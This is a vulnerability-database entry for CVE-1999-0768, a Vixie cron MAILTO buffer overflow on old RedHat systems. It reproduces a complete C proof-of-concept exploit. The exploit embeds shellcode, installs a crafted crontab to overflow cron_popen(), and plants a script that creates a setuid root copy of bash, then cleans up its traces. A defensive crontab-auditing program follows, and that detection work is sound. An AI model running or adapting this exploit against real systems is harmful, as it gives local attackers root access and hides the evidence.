Vixie Cron Buffer Overflow Vulnerability
Vulnerability ID | 1105524 | Type | Buffer overflow |
Published | 1999-08-25 | Updated | 2005-05-02 |
CVE | CVE-1999-0768 |
CNNVD ID | CNNVD-199908-050 |
Platform | Linux | CVSS score | 7.5 |
|Source
|Details
Vixie Cron on RedHat-based systems contains a buffer overflow vulnerability that can be triggered through the MAILTO environment variable.
|Exploit
source: http://www.securityfocus.com/bid/602/info
The version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflowed in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack.
/*
* VixieCron 3.0 Proof of Concept Exploit - w00w00
*
* Not only does Paul give up root with this one, but with his creative use of
* strtok() he actually ends up putting the address of our shellcode in eip.
*
* Many Thanks: Cheez Wiz, Sangfroid
* Thanks: stran9er, Shok
* Props: attrition.org,mea_culpa,awr,minus,Int29,napster,el8.org,w00w00
* Drops: Vixie, happyhacker.org, antionline.com, <insert your favorite web
* defacement group here>
*
* Hellos: pm,cy,bm,ceh,jm,pf,bh,wjg,spike.
*
* [email protected]
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <pwd.h>

char shellcode[] =
    "\xeb\x40\x5e\x89\x76\x0c\x31\xc0\x89\x46\x0b\x89\xf3\xeb"
    "\x27w00w00:Ifwewerehackerswedownyourdumbass\x8d\x4e"
    "\x0c\x31\xd2\x89\x56\x16\xb0\x0b\xcd\x80\xe8\xbb\xff\xff"
    "\xff/tmp/w00w00";

int
main(int argc, char *argv[])
{
    FILE *cfile, *tmpfile;
    struct stat sbuf;
    struct passwd *pw;
    int x;

    pw = getpwuid(getuid());
    chdir(pw->pw_dir);
    cfile = fopen("./cronny", "a+");
    tmpfile = fopen("/tmp/w00w00", "a+");

    /* Write a crontab whose MAILTO value is long enough to overflow the
     * buffer in cron_popen(), followed by the payload and one job line. */
    fprintf(cfile, "MAILTO=");
    for (x = 0; x < 96; x++)
        fprintf(cfile, "w00w00 ");
    fprintf(cfile, "%s", shellcode);
    fprintf(cfile, "\n* * * * * date\n");
    fflush(cfile);

    /* Helper script run by the payload: copies bash into the home
     * directory and makes that copy setuid. */
    fprintf(tmpfile, "#!/bin/sh\ncp /bin/bash %s\nchmod 4755 %s/bash\n",
            pw->pw_dir, pw->pw_dir);
    fflush(tmpfile);
    fclose(cfile), fclose(tmpfile);
    chmod("/tmp/w00w00", S_IXUSR | S_IXGRP | S_IXOTH);

    if (!(fork())) {
        /* Install the crafted crontab. */
        execl("/usr/bin/crontab", "crontab", "./cronny", (char *)0);
    } else {
        printf("Waiting for shell be patient....\n");
        /* Poll until the setuid copy of bash appears. */
        for (;;) {
            if (!(stat("./bash", &sbuf))) {
                break;
            } else {
                sleep(5);
            }
        }
        if ((fork())) {
            printf("Thank you for using w00warez!\n");
            execl("./bash", "bash", (char *)0);
        } else {
            /* Remove the temporary files and the installed crontab. */
            remove("/tmp/w00w00");
            sleep(5);
            remove("./bash");
            remove("./cronny");
            execl("/usr/bin/crontab", "crontab", "-r", (char *)0);
        }
    }
    return 0;
}
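A defender-side audit for the MAILTO trigger described above, added here as example code (not part of the advisory or of Vixie cron): it flags MAILTO assignments in a crontab whose value is implausibly long or contains non-printable bytes, which is how a crafted crontab of the kind shown above looks on disk. The threshold MAILTO_MAX, the function names and the sample crontabs are assumptions of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Audit threshold for a MAILTO value: a hypothetical choice for this example,
 * not a limit taken from Vixie cron. Real mail addresses are far shorter. */
#define MAILTO_MAX 256

/* Returns 1 if the first n bytes of line assign MAILTO a value longer than
 * MAILTO_MAX or containing a non-printable byte, 0 otherwise. */
int mailto_suspicious(const char *line, size_t n)
{
    size_t i = 0, len = 0;
    while (i < n && (line[i] == ' ' || line[i] == '\t')) i++;
    if (n - i < 6 || strncmp(line + i, "MAILTO", 6) != 0) return 0;
    i += 6;
    while (i < n && (line[i] == ' ' || line[i] == '\t')) i++;
    if (i >= n || line[i] != '=') return 0;
    for (i++; i < n && line[i] != '\n'; i++, len++)
        if (!isprint((unsigned char)line[i])) return 1;
    return len > MAILTO_MAX;
}

/* Scans a whole crontab text and returns how many MAILTO lines look suspicious. */
int audit_crontab(const char *text)
{
    int hits = 0;
    const char *p = text;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t n = nl ? (size_t)(nl - p) : strlen(p);
        hits += mailto_suspicious(p, n);
        if (!nl) break;
        p = nl + 1;
    }
    return hits;
}

int main(void)
{
    /* Constructed samples: a normal crontab and one with an oversized MAILTO. */
    const char *benign = "MAILTO=root\n* * * * * date\n";
    char crafted[1024] = "MAILTO=";
    for (int x = 0; x < 96; x++) strcat(crafted, "w00w00 ");
    strcat(crafted, "\n* * * * * date\n");
    printf("benign: %d suspicious line(s)\n", audit_crontab(benign));
    printf("crafted: %d suspicious line(s)\n", audit_crontab(crafted));
    return 0;
}
```

Run it over the output of `crontab -l` for each user to spot entries that do not look like a mail address.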
|References
Source: BID
Name: 602
Link: http://www.securityfocus.com/bid/602